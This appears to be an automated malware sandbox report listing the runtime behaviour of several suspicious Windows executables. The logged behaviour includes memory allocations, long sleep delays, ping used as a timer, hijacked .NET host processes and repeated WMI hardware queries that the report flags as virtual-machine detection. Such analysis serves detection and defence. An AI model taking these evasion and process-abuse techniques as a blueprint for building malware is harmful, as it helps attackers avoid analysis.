Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

System information queried: FirmwareTableInformation

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory allocated: 9E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory allocated: 2700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Memory allocated: 24E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Memory allocated: C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Memory allocated: 2A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Memory allocated: 2780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Memory allocated: 2EACD150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Memory allocated: 2EAE6D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 10E79F20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 10E7B7C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 208F31A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 208F4CB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 2D61B8D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory allocated: 2D635260000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: 13D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: 2E50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\l6E.exe	Memory allocated: 4E50000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1199125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1199015
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198906
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198797
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198687
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198571
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198451
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198330
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1198161
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1197172
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\l6E.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Window / User API: threadDelayed 7513	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Window / User API: threadDelayed 2268	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5345	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4435	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 5183
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 4490
Source: C:\Users\user\AppData\Roaming\l6E.exe	Window / User API: threadDelayed 373

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe TID: 5096	Thread sleep count: 304 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe TID: 5096	Thread sleep count: 195 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe TID: 6116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe TID: 5780	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe TID: 5160	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe TID: 5160	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe TID: 3000	Thread sleep count: 7513 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe TID: 4616	Thread sleep count: 2268 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe TID: 6764	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7024	Thread sleep count: 5345 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7024	Thread sleep count: 4435 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe TID: 776	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59683s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59446s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59214s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5900	Thread sleep time: -720000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59873s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59763s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59650s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59419s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -1199125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -1199015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -1198906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -1198797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -1198687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -1198571s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -1198451s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -1198330s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -1198161s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59943s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59665s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -119094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59438s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59313s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -1197172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59422s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5700	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59871s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59761s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59641s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59532s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59418s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59298s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5928	Thread sleep time: -59442s >= -30000s
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe TID: 4136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\l6E.exe TID: 3048	Thread sleep count: 373 > 30
Source: C:\Users\user\AppData\Roaming\l6E.exe TID: 3048	Thread sleep count: 123 > 30
Source: C:\Users\user\AppData\Roaming\l6E.exe TID: 1008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5032	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
